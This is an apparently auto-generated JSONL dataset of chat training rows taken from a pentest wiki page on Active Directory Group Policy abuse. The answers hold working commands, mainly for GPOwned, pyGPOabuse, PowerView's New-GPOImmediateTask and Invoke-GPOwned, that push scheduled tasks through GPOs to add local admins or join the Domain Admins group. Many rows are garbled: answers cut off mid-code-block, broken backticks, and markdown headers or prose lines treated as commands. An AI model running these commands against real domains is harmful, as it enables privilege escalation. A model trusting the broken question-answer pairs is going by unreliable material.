property (no GUID specified)\n* WriteDacl, WriteOwner", "metadata": {"corpus_index": 478, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Group policies - Practice"}, {"role": "assistant", "content": "GPO-based attacks can be conducted with New-GPOImmediateTask (PowerView module), SharpGPOAbuse (C#), or pyGPOabuse (python) and GPOwned (Python) for UNIX-like systems."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Group policies - Practice", "response": "GPO-based attacks can be conducted with New-GPOImmediateTask (PowerView module), SharpGPOAbuse (C#), or pyGPOabuse (python) and GPOwned (Python) for UNIX-like systems.", "metadata": {"corpus_index": 479, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Group policies - Practice"}, {"role": "assistant", "content": "GPO-based attacks can be conducted with New-GPOImmediateTask (PowerView module), SharpGPOAbuse (C#), or pyGPOabuse (python) and GPOwned (Python) for UNIX-like systems."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Group policies - Practice", "response": "GPO-based attacks can be conducted with New-GPOImmediateTask (PowerView module), SharpGPOAbuse (C#), or pyGPOabuse (python) and GPOwned (Python) for UNIX-like systems.", "metadata": {"corpus_index": 479, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Group policies - Immediate Scheduled Task"}, {"role": "assistant", "content": "An attacker can edit the GPO to add a scheduled task that runs instantly and removes itself after, every time Group Policy refreshes. The attacker can then gain access to all AD objects this GPO applies to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, a new immediate scheduled task can be created with GPOwned (Python) or added to an existing GPO with pyGPOabuse (Python).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Group policies - Immediate Scheduled Task", "response": "An attacker can edit the GPO to add a scheduled task that runs instantly and removes itself after, every time Group Policy refreshes. The attacker can then gain access to all AD objects this GPO applies to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, a new immediate scheduled task can be created with GPOwned (Python) or added to an existing GPO with pyGPOabuse (Python).\n\n```bash", "metadata": {"corpus_index": 480, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Group policies - Immediate Scheduled Task"}, {"role": "assistant", "content": "An attacker can edit the GPO to add a scheduled task that runs instantly and removes itself after, every time Group Policy refreshes. The attacker can then gain access to all AD objects this GPO applies to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, a new immediate scheduled task can be created with GPOwned (Python) or added to an existing GPO with pyGPOabuse (Python).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Group policies - Immediate Scheduled Task", "response": "An attacker can edit the GPO to add a scheduled task that runs instantly and removes itself after, every time Group Policy refreshes. The attacker can then gain access to all AD objects this GPO applies to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, a new immediate scheduled task can be created with GPOwned (Python) or added to an existing GPO with pyGPOabuse (Python).\n\n```bash", "metadata": {"corpus_index": 480, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe GPOwned (buggy, not to use in production) - execute something (e.g. calc.exe) in the context of penetration testing"}, {"role": "assistant", "content": "GPOwned -u 'user' -p 'password' -d 'domain' -dc-ip 'domaincontroller' -gpoimmtask -name '{12345677-ABCD-9876-ABCD-123456789012}' -author 'DOMAIN\\Administrator' -taskname 'Some name' -taskdescription 'Some description' -dstpath 'c:\\windows\\system32\\calc.exe'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe GPOwned (buggy, not to use in production) - execute something (e.g. calc.exe) in the context of penetration testing", "response": "GPOwned -u 'user' -p 'password' -d 'domain' -dc-ip 'domaincontroller' -gpoimmtask -name '{12345677-ABCD-9876-ABCD-123456789012}' -author 'DOMAIN\\Administrator' -taskname 'Some name' -taskdescription 'Some description' -dstpath 'c:\\windows\\system32\\calc.exe'", "metadata": {"corpus_index": 481, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for GPOwned (buggy, not to use in production) - execute something (e.g. calc.exe)?"}, {"role": "assistant", "content": "GPOwned -u 'user' -p 'password' -d 'domain' -dc-ip 'domaincontroller' -gpoimmtask -name '{12345677-ABCD-9876-ABCD-123456789012}' -author 'DOMAIN\\Administrator' -taskname 'Some name' -taskdescription 'Some description' -dstpath 'c:\\windows\\system32\\calc.exe'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for GPOwned (buggy, not to use in production) - execute something (e.g. calc.exe)?", "response": "GPOwned -u 'user' -p 'password' -d 'domain' -dc-ip 'domaincontroller' -gpoimmtask -name '{12345677-ABCD-9876-ABCD-123456789012}' -author 'DOMAIN\\Administrator' -taskname 'Some name' -taskdescription 'Some description' -dstpath 'c:\\windows\\system32\\calc.exe'", "metadata": {"corpus_index": 481, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about pyGPOabuse, update an existing GPO - add a local admin"}, {"role": "assistant", "content": "pygpoabuse 'domain'/'user':'password' -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\"\n``\n\n=== Windows\n\nFrom Windows, a new immediate scheduled task can be created with Powerview's New-GPOImmediateTask module (Powershell). In the following example, a user is added to the local administrators group.\n\n`bash\nNew-GPOImmediateTask -Verbose -Force -TaskName 'TaskName' -GPODisplayName 'GPODisplayName' -Command cmd -CommandArguments \"/c net localgroup administrators shutdown /add\"\n`\n\nAfter a successful execution, the scheduled task can be removed with the following command.\n\n`bash\nNew-GPOImmediateTask -Force -Remove -GPODisplayName 'GPODisplayName'\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about pyGPOabuse, update an existing GPO - add a local admin", "response": "pygpoabuse 'domain'/'user':'password' -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\"\n``\n\n=== Windows\n\nFrom Windows, a new immediate scheduled task can be created with Powerview's New-GPOImmediateTask module (Powershell). In the following example, a user is added to the local administrators group.\n\n`bash\nNew-GPOImmediateTask -Verbose -Force -TaskName 'TaskName' -GPODisplayName 'GPODisplayName' -Command cmd -CommandArguments \"/c net localgroup administrators shutdown /add\"\n`\n\nAfter a successful execution, the scheduled task can be removed with the following command.\n\n`bash\nNew-GPOImmediateTask -Force -Remove -GPODisplayName 'GPODisplayName'\n``\n\n:::", "metadata": {"corpus_index": 482, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do pyGPOabuse, update an existing GPO - add a local admin"}, {"role": "assistant", "content": "pygpoabuse 'domain'/'user':'password' -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\"\n``\n\n=== Windows\n\nFrom Windows, a new immediate scheduled task can be created with Powerview's New-GPOImmediateTask module (Powershell). In the following example, a user is added to the local administrators group.\n\n`bash\nNew-GPOImmediateTask -Verbose -Force -TaskName 'TaskName' -GPODisplayName 'GPODisplayName' -Command cmd -CommandArguments \"/c net localgroup administrators shutdown /add\"\n`\n\nAfter a successful execution, the scheduled task can be removed with the following command.\n\n`bash\nNew-GPOImmediateTask -Force -Remove -GPODisplayName 'GPODisplayName'\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do pyGPOabuse, update an existing GPO - add a local admin", "response": "pygpoabuse 'domain'/'user':'password' -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\"\n``\n\n=== Windows\n\nFrom Windows, a new immediate scheduled task can be created with Powerview's New-GPOImmediateTask module (Powershell). In the following example, a user is added to the local administrators group.\n\n`bash\nNew-GPOImmediateTask -Verbose -Force -TaskName 'TaskName' -GPODisplayName 'GPODisplayName' -Command cmd -CommandArguments \"/c net localgroup administrators shutdown /add\"\n`\n\nAfter a successful execution, the scheduled task can be removed with the following command.\n\n`bash\nNew-GPOImmediateTask -Force -Remove -GPODisplayName 'GPODisplayName'\n``\n\n:::", "metadata": {"corpus_index": 482, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do pyGPOabuse, update an existing GPO - add a local admin"}, {"role": "assistant", "content": "=== Windows\n\nFrom Windows, a new immediate scheduled task can be created with [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)'s [New-GPOImmediateTask](https://github.com/PowerShellMafia/PowerSploit/blob/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1#L5907-L6122) module (Powershell). In the following example, a user is added to the local administrators group."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do pyGPOabuse, update an existing GPO - add a local admin", "response": "=== Windows\n\nFrom Windows, a new immediate scheduled task can be created with [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)'s [New-GPOImmediateTask](https://github.com/PowerShellMafia/PowerSploit/blob/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1#L5907-L6122) module (Powershell). In the following example, a user is added to the local administrators group.", "metadata": {"corpus_index": 483, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for pygpoabuse, update an existing gpo - add a local admin. pyGPOabuse, update an existing GPO - add a local admin"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for pygpoabuse, update an existing gpo - add a local admin. pyGPOabuse, update an existing GPO - add a local admin", "metadata": {"corpus_index": 483, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the After command to pygpoabuse, update an existing gpo - add a local admin"}, {"role": "assistant", "content": "After a successful execution, the scheduled task can be removed with the following command."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the After command to pygpoabuse, update an existing gpo - add a local admin", "response": "After a successful execution, the scheduled task can be removed with the following command.", "metadata": {"corpus_index": 484, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "After"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out pyGPOabuse, update an existing GPO - add a local admin during a pentest?"}, {"role": "assistant", "content": "After a successful execution, the scheduled task can be removed with the following command."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out pyGPOabuse, update an existing GPO - add a local admin during a pentest?", "response": "After a successful execution, the scheduled task can be removed with the following command.", "metadata": {"corpus_index": 484, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `After a successful execution, the scheduled task can be removed with the following command.`?"}, {"role": "assistant", "content": "This command is used for pygpoabuse, update an existing gpo - add a local admin. pyGPOabuse, update an existing GPO - add a local admin"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `After a successful execution, the scheduled task can be removed with the following command.`?", "response": "This command is used for pygpoabuse, update an existing gpo - add a local admin. pyGPOabuse, update an existing GPO - add a local admin", "metadata": {"corpus_index": 484, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Group policies - Manually adding a user to the local admin group"}, {"role": "assistant", "content": "An attacker can also manually add a user to the local administrator group. This can be achieved with the Group Policy Management Editor.\n\nStep 1: create the user\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Create > User name: \n\nStep 2: add the user to the local admin group\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Update > Group name : > Members: Add:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Group policies - Manually adding a user to the local admin group", "response": "An attacker can also manually add a user to the local administrator group. This can be achieved with the Group Policy Management Editor.\n\nStep 1: create the user\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Create > User name: \n\nStep 2: add the user to the local admin group\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Update > Group name : > Members: Add:", "metadata": {"corpus_index": 485, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Group policies - Manually adding a user to the local admin group?"}, {"role": "assistant", "content": "An attacker can also manually add a user to the local administrator group. This can be achieved with the Group Policy Management Editor.\n\nStep 1: create the user\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Create > User name: \n\nStep 2: add the user to the local admin group\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Update > Group name : > Members: Add:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Group policies - Manually adding a user to the local admin group?", "response": "An attacker can also manually add a user to the local administrator group. This can be achieved with the Group Policy Management Editor.\n\nStep 1: create the user\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Create > User name: \n\nStep 2: add the user to the local admin group\n\nWindows search bar > Group Policy Management Editor > Computer configuration > Preferences > Control Panel Settings > Local Users and Groups > Right click on it > New > Local User > Action: Update > Group name : > Members: Add:", "metadata": {"corpus_index": 485, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Group policies - MultiTasking Attack"}, {"role": "assistant", "content": "In a scenario where a domain admin session is present on a workstation/server which is not a domain controller, an attacker can edit the GPO to add a two-stage scheduled task that escalates to domain admin when controlling a GPO linked to the correlating OU. The attack creates an immediate task that executes as NT Authority\\SYSTEM, using SYSVOL as an open share to drop a batch file, which then registers a second scheduled task running with \"highest available privileges\". The second task executes in the context of the domain admin, adding the attacker to the domain admins group.\n\n::: tabs\n\n=== Windows\n\nUsing Invoke-GPOwned:\n\n``powershell\nInvoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Group policies - MultiTasking Attack", "response": "In a scenario where a domain admin session is present on a workstation/server which is not a domain controller, an attacker can edit the GPO to add a two-stage scheduled task that escalates to domain admin when controlling a GPO linked to the correlating OU. The attack creates an immediate task that executes as NT Authority\\SYSTEM, using SYSVOL as an open share to drop a batch file, which then registers a second scheduled task running with \"highest available privileges\". The second task executes in the context of the domain admin, adding the attacker to the domain admins group.\n\n::: tabs\n\n=== Windows\n\nUsing Invoke-GPOwned:\n\n``powershell\nInvoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"\n``\n\n:::", "metadata": {"corpus_index": 486, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Group policies - MultiTasking Attack?"}, {"role": "assistant", "content": "In a scenario where a domain admin session is present on a workstation/server which is not a domain controller, an attacker can edit the GPO to add a two-stage scheduled task that escalates to domain admin when controlling a GPO linked to the correlating OU. The attack creates an immediate task that executes as NT Authority\\SYSTEM, using SYSVOL as an open share to drop a batch file, which then registers a second scheduled task running with \"highest available privileges\". The second task executes in the context of the domain admin, adding the attacker to the domain admins group.\n\n::: tabs\n\n=== Windows\n\nUsing Invoke-GPOwned:\n\n``powershell\nInvoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Group policies - MultiTasking Attack?", "response": "In a scenario where a domain admin session is present on a workstation/server which is not a domain controller, an attacker can edit the GPO to add a two-stage scheduled task that escalates to domain admin when controlling a GPO linked to the correlating OU. The attack creates an immediate task that executes as NT Authority\\SYSTEM, using SYSVOL as an open share to drop a batch file, which then registers a second scheduled task running with \"highest available privileges\". The second task executes in the context of the domain admin, adding the attacker to the domain admins group.\n\n::: tabs\n\n=== Windows\n\nUsing Invoke-GPOwned:\n\n``powershell\nInvoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"\n``\n\n:::", "metadata": {"corpus_index": 486, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Invoke-GPOwned command to group policies - multitasking attack"}, {"role": "assistant", "content": "Invoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Invoke-GPOwned command to group policies - multitasking attack", "response": "Invoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"", "metadata": {"corpus_index": 487, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Invoke-GPOwned"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Group policies - MultiTasking Attack?"}, {"role": "assistant", "content": "Invoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Group policies - MultiTasking Attack?", "response": "Invoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"", "metadata": {"corpus_index": 487, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Invoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"`?"}, {"role": "assistant", "content": "This command is used for group policies - multitasking attack. MultiTasking Attack"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Invoke-GPOwned -GPOName \"Target_GPO_Name\" -LoadDLL \".\\Microsoft.ActiveDirectory.Management.dll\" -User \"Attacker\" -DA -ScheduledTasksXMLPath \".\\ScheduledTasks.xml\" -SecondTaskXMLPath \".\\wsadd.xml\" -Author \"DA_User\" -SecondXMLCMD \"/r net group 'Domain Admins' /add /domain\"`?", "response": "This command is used for group policies - multitasking attack. MultiTasking Attack", "metadata": {"corpus_index": 487, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Group policies - Force Group Policy update?"}, {"role": "assistant", "content": "Domain members refresh group policy settings every 90 minutes by default but it can locally be forced with the following command: gpupdate /force."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Group policies - Force Group Policy update?", "response": "Domain members refresh group policy settings every 90 minutes by default but it can locally be forced with the following command: gpupdate /force.", "metadata": {"corpus_index": 488, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Group policies - Force Group Policy update?"}, {"role": "assistant", "content": "Domain members refresh group policy settings every 90 minutes by default but it can locally be forced with the following command: gpupdate /force."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Group policies - Force Group Policy update?", "response": "Domain members refresh group policy settings every 90 minutes by default but it can locally be forced with the following command: gpupdate /force.", "metadata": {"corpus_index": 488, "category": "active_directory", "source_file": "docs/src/ad/movement/group-policies.md", "page_title": "Group policies", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Group policies - Other exploitation paths"}, {"role": "assistant", "content": "In addition to 